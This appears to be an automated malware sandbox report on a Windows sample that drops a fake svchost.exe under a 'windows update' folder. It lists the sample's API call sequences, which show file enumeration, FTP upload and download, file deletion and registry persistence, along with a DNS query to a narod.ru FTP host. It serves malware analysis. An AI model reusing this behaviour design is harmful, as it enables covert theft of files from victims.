??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?4_2_006724F0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006728A7 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,memset,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,RegOpenKeyExA,RegSetValueExA,RegCloseKe4_2_006728A7
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00671CB0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpGetFileA,memset,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fopen,fopen,fopen,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,memset,feof,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fclose,fclose,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fopen,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,4_2_00671CB0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006725B9 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$bas4_2_006725B9
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00672687 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@s4_2_00672687
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00671A80 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fopen,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fgetc,fputc,fclose,fclose,fclose,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,4_2_00671A80
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00673B90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpGetFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fopen,fopen,memset,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fgetc,fprintf,feof,fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,fprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,memset,feof,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fprintf,fclose,fclose,fclose,FtpPutFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpGetFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,fopen,fopen,fopen,memset,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fgetc,feof,fgetc,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,memset,feof,fprintf,fprintf,fprintf,fprintf,fclose,fclose,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,DeleteFileA,DeleteFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,fopen,fprintf,fprintf,fprintf,fprintf,fclose,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpPutFileA,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,4_2_00673B90
Source: unknownDNS traffic detected: query: ruslyz.ftp.narod.ru replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: ruslyz.ftp.narod.ru
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006714801_2_00671480
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006714804_2_00671480
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal88.evad.winEXE@5/2@27/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_00921000 LoadStringA,LoadStringA,LoadStringA,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,GetUserNameA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateDirectoryA,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,RegCreateKeyA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,RegSetValueExA,RegClos